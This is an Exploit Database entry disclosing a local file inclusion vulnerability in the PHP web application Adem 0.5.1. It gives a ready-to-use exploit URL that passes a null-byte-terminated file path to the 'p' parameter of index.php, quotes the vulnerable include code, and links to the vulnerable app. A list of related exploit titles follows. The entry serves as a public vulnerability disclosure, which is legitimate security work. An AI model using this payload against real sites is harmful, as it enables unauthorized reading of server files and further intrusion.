Exploit Database - Logo

Adem 0.5.1 - Local File Inclusion

EDB-ID: 33072 Author: JIKO Published: 2014-04-28
CVE: N/A Type: Webapps Platform: PHP
E-DB Verified: Waiting verification Exploit: Download Exploit Code Download / View Raw Vulnerable App: Download Vulnerable Application
« Previous Exploit Next Exploit » 
----------[exploit Debut]
[Local File Include Vulnerability]
----------[Script Info]
 
Author        : JIKO
 
----------[Script Info]
 
Site        : https://github.com/4FSB/Adem && http://adem.faares.com/demo
Version     : 0.5.1
Download    : https://codeload.github.com/4FSB/Adem/zip/master
 
----------[exploit Info]
 
Exploit :
http://Path/index.php?p=File%00

Line : 8-10
Page : index.php
Code :
     if(is_file($file) && file_exists($file)){
            include $file;
       

 }
----------[exploit Fin]

Related Exploits

Trying to match OSVDBs (1): 106353
Trying to match setup file: a0c4f0d176f87ceda9b9890af09ed644
Other Possible E-DB Search Terms: Adem 0.5.1,  Adem
Date D V Title Author
2007-05-26Download Exploit Code Verified Microsoft Internet Explorer 6 / Ademco co. ltd. ATNBaseLoader100 Module - Remote Buffer Overflowrgod
2007-08-24Download Exploit Code Verified Arcadem 2.01 - 'index.php' Remote File Inclusionsm0k3
2007-12-21Download Exploit Code Verified Arcadem LE 2.04 - 'loadadminpage' Remote File InclusionKnocKout
2008-09-29Download Exploit Code Verified Arcadem Pro - 'articlecat' SQL InjectionHussin X
2009-08-18Download Exploit Code Verified Arcadem Pro 2.8 - 'article' Blind SQL InjectionMr.SQL
2005-12-12Download Exploit Code Verified BlackBoard Academic Suite 6.2.3.23 - Frameset.jsp Cross-Domain Frameset Loadingdr_insane
2008-03-26Download Exploit Code Verified BlackBoard Academic Suite 6/7 - '/bin/common/announcement.pl?data__announcements___pk1_pk2__subject' Cross-...Knight4vn
2008-03-26Download Exploit Code Verified BlackBoard Academic Suite 6/7 - '/webapps/BlackBoard/execute/viewCatalog?searchText' Cross-Site ScriptingKnight4vn
2003-03-17Download Exploit Code Verified Kebi Academy 2001 - Input Validationdong-h0un U
2005-04-02Download Exploit Code Verified Star Wars Jedi Knight: Jedi Academy 1.0.11 - Buffer OverflowLuigi Auriemma
2012-05-16Download Exploit Code Verified Unijimpe Captcha - 'captchademo.php' Cross-Site ScriptingDaniel Godoy
2008-06-19Download Exploit Code Verified Yektaweb Academic Web Tools CMS 1.4.2.8 - Multiple VulnerabilitiesBugReport.IR
2007-08-27Download Exploit Code Verified Arcadem 2.01 - SQL Injection / Remote File InclusionSmOk3
2010-06-29Download Exploit Code Verified ArcademSX 2.904 - 'cat' Cross-Site ScriptingTh3 RDX
2017-03-09Download Exploit Code Waiting verification TradeMart 1.1 - SQL InjectionIhsan Sencan
2010-10-02Download Exploit Code Verified TradeMC E-Ticaret - SQL Injection / Cross-Site ScriptingKnocKout
2009-03-02Download Exploit Code Verified Yektaweb Academic Web Tools CMS 1.4.2.8/1.5.7 - Multiple Cross-Site Scripting VulnerabilitiesIsfahan
Menu